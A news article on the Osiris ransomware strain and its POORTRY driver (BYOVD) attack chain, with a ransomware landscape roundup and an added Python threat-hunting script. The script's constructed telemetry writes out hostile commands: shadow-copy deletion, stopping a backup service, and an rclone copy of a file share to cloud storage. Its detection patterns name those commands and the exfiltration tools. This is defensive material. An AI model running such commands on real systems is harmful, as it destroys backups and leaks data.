New Osiris Ransomware Strain Uses POORTRY Driver in BYOVD Attacks

Cybersecurity researchers have uncovered a new ransomware strain called Osiris, which targeted a major food service franchise operator in Southeast Asia in November 2025. The attack demonstrates advanced techniques, including the use of a malicious driver named POORTRY in a bring your own vulnerable driver (BYOVD) attack to disable security software.

Osiris: A Brand-New Ransomware Strain

Osiris is a completely new ransomware family, unrelated to the variant that appeared in December 2016 as part of the Locky ransomware lineage. Researchers from Symantec and Carbon Black noted that the developers remain unidentified, and it is unclear if Osiris operates as a ransomware-as-a-service (RaaS).

Some evidence links the attackers to the INC ransomware (aka Warble) campaigns, based on similarities in tooling and tactics. The attackers exfiltrated data to Wasabi cloud buckets and reused a version of Mimikatz (kaz.exe) previously associated with INC ransomware operations.

Attack Techniques and Payload Behavior

Osiris uses a hybrid encryption scheme, generating a unique key for each file. In a hybrid scheme of this kind the per-file symmetric key is itself encrypted with a public key held by the attackers, so recovering one file's key from memory or disk does not help with any other file. The ransomware is highly configurable, capable of:

  • Stopping services and terminating processes
  • Specifying folders and file extensions for encryption
  • Dropping ransom notes

By default, Osiris targets processes and services related to Microsoft Office, Exchange, Mozilla Firefox, WordPad, Notepad, Volume Shadow Copy, and Veeam, among others.

Data Exfiltration and Dual-Use Tools

The attack chain began with data exfiltration using Rclone to Wasabi cloud storage. Dual-use tools such as Netscan, NetExec, and MeshAgent, along with a customized build of the RustDesk remote desktop software, were used to establish persistent remote control and to stage the ransomware deployment.

POORTRY Driver and BYOVD Attack

The POORTRY driver sets this intrusion apart from typical BYOVD attacks. Instead of abusing a legitimate but vulnerable third-party driver, POORTRY is a bespoke malicious driver designed to:

  • Elevate privileges
  • Terminate security software

Because 64-bit Windows will not load an unsigned kernel driver, a bespoke driver of this kind implies a signing step under the attackers' control; the relevant defensive controls are therefore hash- and signer-based driver blocklists and hypervisor-protected code integrity (HVCI), not patching a vendor's driver. Additionally, a KillAV tool was deployed to disable security processes, and RDP was enabled for remote access.
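The exfiltration, backup tampering and driver-load stages described in this section and the one before it leave distinct traces in endpoint telemetry. The following is an added hunting example written for this article; it is not code from the page, from Symantec or Carbon Black, or from the Osiris operators. It assumes Sysmon-style field names (event ID 1 process creation, 3 network connection, 6 driver load), and the event records, the service name VeeamBackupSvc, the driver name drv.sys and the signer name are all constructed for illustration. The driver check deliberately does not rely on signature validity, since a bespoke driver that Windows accepted may carry a valid signature; it keys on the signer and the load path instead.

```python
"""Hunt for the Osiris-style attack chain (exfiltration, backup/VSS tampering,
rogue driver load) in Sysmon-like endpoint telemetry.

Added example for this article, not code from the page. The records below are
constructed to resemble Sysmon event IDs 1, 3 and 6; they are not logs from
the incident.
"""
import re

# Constructed sample telemetry (hypothetical hosts, users, names and paths).
EVENTS = [
    {"EventID": 1, "Image": "C:\\Users\\svc\\rclone.exe",
     "CommandLine": 'rclone.exe copy "\\\\FS01\\finance" wasabi:corp-dump --transfers 32',
     "User": "CORP\\svc"},
    {"EventID": 3, "Image": "C:\\Users\\svc\\rclone.exe",
     "DestinationHostname": "s3.wasabisys.com", "DestinationPort": 443},
    {"EventID": 1, "Image": "C:\\Windows\\System32\\net.exe",
     "CommandLine": "net stop VeeamBackupSvc /y", "User": "CORP\\Administrator"},
    {"EventID": 1, "Image": "C:\\Windows\\System32\\vssadmin.exe",
     "CommandLine": "vssadmin delete shadows /all /quiet", "User": "CORP\\Administrator"},
    {"EventID": 6, "ImageLoaded": "C:\\Windows\\Temp\\drv.sys",
     "Signed": "true", "Signature": "Contoso Drivers Ltd", "SignatureStatus": "Valid"},
    {"EventID": 6, "ImageLoaded": "C:\\Windows\\System32\\drivers\\tcpip.sys",
     "Signed": "true", "Signature": "Microsoft Windows", "SignatureStatus": "Valid"},
    {"EventID": 1, "Image": "C:\\Program Files\\Mozilla Firefox\\firefox.exe",
     "CommandLine": "firefox.exe", "User": "CORP\\alice"},
]

# Sync/transfer tools seen in exfiltration, and the storage endpoints they reach.
EXFIL_TOOLS = {"rclone.exe", "megasync.exe", "winscp.exe"}
CLOUD_STORAGE_HOSTS = ("wasabisys.com", "amazonaws.com", "mega.nz", "backblazeb2.com")

# Commands that stop services or delete shadow copies, plus backup-related
# targets (the page lists Volume Shadow Copy and Veeam among Osiris's defaults).
SERVICE_STOP_RE = re.compile(
    r"\b(net1?\s+stop|sc(?:\.exe)?\s+(?:stop|delete)|taskkill|"
    r"vssadmin\s+delete\s+shadows|wmic\s+shadowcopy\s+delete)\b", re.I)
BACKUP_HINTS = ("veeam", "vss", "shadow", "sql", "exchange")

# Windows accepted the driver, so its signature may be valid; a non-Microsoft
# signer loading from a user-writable path is the rogue-driver tell.
SUSPICIOUS_DRIVER_DIRS = ("\\temp\\", "\\users\\", "\\programdata\\", "\\appdata\\")


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_exfil(ev):
    name = _basename(ev.get("Image", ""))
    if ev["EventID"] == 1 and name in EXFIL_TOOLS:
        return "exfil tool launched: " + ev["CommandLine"]
    if ev["EventID"] == 3:
        host = ev.get("DestinationHostname", "").lower()
        if name in EXFIL_TOOLS or any(host.endswith(h) for h in CLOUD_STORAGE_HOSTS):
            return f"{name} -> {host}:{ev.get('DestinationPort')}"
    return None


def check_backup_tampering(ev):
    if ev["EventID"] != 1:
        return None
    cmd = ev.get("CommandLine", "")
    if SERVICE_STOP_RE.search(cmd) and any(h in cmd.lower() for h in BACKUP_HINTS):
        return "backup/VSS tampering: " + cmd
    return None


def check_driver_load(ev):
    if ev["EventID"] != 6:
        return None
    path = ev.get("ImageLoaded", "")
    signer = ev.get("Signature", "").lower()
    if ev.get("Signed", "").lower() != "true" or ev.get("SignatureStatus") != "Valid":
        return "unsigned or invalidly signed driver: " + path
    if not signer.startswith("microsoft") and any(d in path.lower() for d in SUSPICIOUS_DRIVER_DIRS):
        return f"third-party driver ({ev['Signature']}) loaded from unusual path: {path}"
    return None


CHECKS = (("exfiltration", check_exfil),
          ("backup_tampering", check_backup_tampering),
          ("driver_load", check_driver_load))


def hunt(events):
    """Return (category, detail) pairs for every event that trips a check."""
    findings = []
    for ev in events:
        for category, check in CHECKS:
            detail = check(ev)
            if detail:
                findings.append((category, detail))
    return findings


def triage(findings):
    """Escalate when exfiltration and defence/backup tampering appear together:
    that pairing is the pre-encryption stage of the chain described above."""
    seen = {c for c, _ in findings}
    if "exfiltration" in seen and ({"driver_load", "backup_tampering"} & seen):
        return "critical: exfiltration plus defence/backup tampering on one host"
    if seen:
        return "investigate: " + ", ".join(sorted(seen))
    return "clean"


if __name__ == "__main__":
    results = hunt(EVENTS)
    for category, detail in results:
        print(f"[{category}] {detail}")
    print(triage(results))
```

On the sample telemetry the script flags the Rclone launch and its connection to s3.wasabisys.com, the two backup-tampering commands, and the third-party driver loaded from C:\Windows\Temp, while leaving tcpip.sys and Firefox alone; the triage step escalates because exfiltration and tampering occur on the same host. In production the same checks would run over real Sysmon or EDR events, with the tool and host lists tuned to the environment.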

Broader Ransomware Landscape

Ransomware remains a major enterprise threat, with the ecosystem constantly evolving:

  • Akira has leveraged a vulnerable ThrottleStop driver, and has abused the legitimate Windows CardSpace UI Agent and Microsoft Media Foundation executables to DLL-sideload the Bumblebee loader. The group has also exploited SonicWall SSL VPNs and used ClickFix-style fake CAPTCHA pages to deliver .NET RATs (SectopRAT).
  • LockBit continues to evolve with LockBit 5.0, including a two-stage deployment model and targeting multiple operating systems.
  • Sicarii, a new RaaS, claims one victim in late 2025 but shows signs of potential false-flag activity due to Russian-language use despite self-identifying as Israeli/Jewish.
  • Storm-2603 (CL-CRI-1040 / Gold Salem) has used Velociraptor and BYOVD attacks with drivers like rsndispot.sys and kl.sys to deploy Warlock, LockBit, and Babuk ransomware.
  • Makop has targeted India, Brazil, and Germany using exposed RDPs, dual-use tools, BYOVD drivers, and GuLoader to stage and deliver ransomware.
  • Obscura contains an encryption flaw leaving files over 1GB unrecoverable.
  • 01flip, written in Rust, targets Windows and Linux and exploits known CVEs to infiltrate networks.

Recommendations for Organizations

To defend against targeted ransomware attacks like Osiris:

  • Monitor dual-use tools for unusual activity
  • Restrict and secure RDP access, and enforce multi-factor authentication (MFA)
  • Use application allowlisting where possible
  • Maintain offline or off-site backups

Symantec and Carbon Black emphasize that while traditional encrypting ransomware remains prevalent, encryptionless attacks and hybrid extortion tactics are expanding the threat ecosystem, making ransomware only one component of a broader cyber-extortion risk.
